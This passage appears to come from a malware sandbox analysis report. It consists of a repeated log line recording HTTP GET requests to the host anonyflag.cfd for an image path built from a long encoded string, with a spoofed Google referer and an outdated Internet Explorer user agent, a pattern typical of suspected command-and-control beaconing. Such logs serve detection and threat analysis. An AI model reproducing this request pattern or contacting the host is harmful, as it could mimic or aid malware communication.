Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
